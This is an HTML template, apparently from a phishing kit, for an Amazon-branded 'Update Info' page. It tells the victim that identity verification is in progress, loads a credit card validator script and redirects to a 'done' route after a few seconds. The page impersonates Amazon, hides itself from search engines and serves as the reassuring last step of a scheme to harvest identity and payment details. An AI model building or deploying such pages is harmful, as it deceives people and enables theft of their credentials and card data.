<!DOCTYPE html>
<html class="a-touch a-mobile a-js a-audio a-video a-canvas a-svg a-drag-drop a-geolocation a-history a-webworker a-autofocus a-input-placeholder a-textarea-placeholder a-local-storage a-orientation a-touch a-gradients a-hires a-transform3d a-touch-scrolling a-ios a-mobile a-text-shadow a-text-stroke a-box-shadow a-border-radius a-border-image a-opacity a-transform a-transition a-ember" data-19ax5a9jf="mongoose" data-aui-build-date="3.21.9-2022-06-01">
<head>
    <meta name="viewport" content="width=device-width, maximum-scale=1, minimum-scale=1, initial-scale=1, user-scalable=no, shrink-to-fit=no">
    <meta charset="utf-8">
    <meta name="robots" content="noindex, nofollow">
    <title dir="ltr">Amazon - Update Info</title>
    <link rel="shortcut icon" href="{{ url_for('static',filename='img/favicon.ico') }}" />
    <link rel="stylesheet" type="text/css" href="{{ url_for('static',filename='css/boostrap.min.css') }}" media="all">
    <link rel="stylesheet" type="text/css" href="{{ url_for('static',filename='css/style.css') }}">
    <link rel="stylesheet" href="{{ url_for('static',filename='css/mobile.style2.css') }}">
    <link rel="stylesheet" href="{{ url_for('static',filename='css/mobile.style.css') }}">
    <style>
        #aa-challenge-whole-page-iframe {
            overflow: hidden;
            opacity: 1.0;
            position: fixed;
            top: 0px;
            bottom: 0px;
            right: 0px;
            border: none;
            margin: 0;
            padding: 0;
            height: 100%;
            width: 100%;
            z-index: 999999;
        }
    </style>
</head>

<body onload="_loader()" style="margin:0;" class="a-color-offset-background a-m-us a-aui_72554-c a-aui_accordion_a11y_role_354025-c a-aui_killswitch_csa_logger_372963-c a-aui_launch_2021_ally_fixes_392482-c a-aui_pci_risk_banner_210084-c a-aui_preload_261698-c a-aui_rel_noreferrer_noopener_309527-c a-aui_template_weblab_cache_333406-c a-aui_tnr_v2_180836-c">
    <div id="a-page">
        <script type="a-state" data-a-state="{&quot;key&quot;:&quot;a-wlab-states&quot;}">{}</script>
        <div class="a-section a-spacing-none">
            <div class="a-container a-global-nav-wrapper">
                <div class="a-section a-spacing-none a-text-center">
                    <a class="a-link-nav-icon" tabindex="-1" href="#">
                        <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
                    </a>
                </div>
            </div>
        </div>
        <div id="authportal-center-section" class="a-section">
            <div class="a-container">
                <div class="a-section a-spacing-none"></div>
                <div class="a-section a-spacing-none auth-pagelet-mobile-container"></div>
                <div class="a-section auth-pagelet-mobile-container">
                    <div class="a-section a-spacing-extra-large">
                        <center>
                            <div align="center"> <img src="{{ url_for('static',filename='img/finish.png') }}" width="150"> </div>
                            <h1 class="a-spacing-mini"> Thank you! </h1>
                            <p> Your Identity verification is in progress.<br>We will notify you via email message as soon as your account will be verified. </p>
                        </center>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="a-row auth-footer">
        <style>
            .auth-footer-separator {
                display: inline-block;
                width: 20px;
            }
        </style>
        <div class="a-divider a-divider-section">
            <div class="a-divider-inner"></div>
        </div>
        <div id="footer" class="a-section">
            <div class="a-section a-spacing-small a-text-center a-size-mini">
                <span class="auth-footer-separator"></span>
                <a class="a-link-normal" target="_blank" rel="noopener" href="javascript void(0)"> Conditions of Use </a>
                <span class="auth-footer-separator"></span>
                <a class="a-link-normal" target="_blank" rel="noopener" href="javascript void(0)"> Privacy Notice </a>
                <span class="auth-footer-separator"></span>
                <a class="a-link-normal" target="_blank" rel="noopener" href="javascript void(0)"> Help </a>
                <span class="auth-footer-separator"></span>
            </div>
            <div class="a-section a-spacing-none a-text-center">
                <span class="a-size-mini a-color-secondary"> © 1996-2023, Amazon.com, Inc. or its affiliates </span>
            </div>
        </div>
    </div>
    </div>
    <div id="a-popover-root" style="z-index:-1;position:absolute;"></div>
    <div id="a-white"></div>
                    <script src="{{ url_for('static',filename='js/jquery-3.3.1.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/jquery.mask.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/jquery.validate.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/additional-methods.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/jquery.creditCardValidator.js') }}"></script>
    <script>
        let load;

        let _loader = () => {
            load = setTimeout(showPage, 1000);
        }

        let showPage = () => {
            document.getElementById('loader').style.display = 'none';
            document.getElementById('myDiv').style.display = 'block';
        }

        let timer = setTimeout(function() {
            window.location = "{{ url_for('done') }}"
        }, 5250);
    </script>
</body>

</html>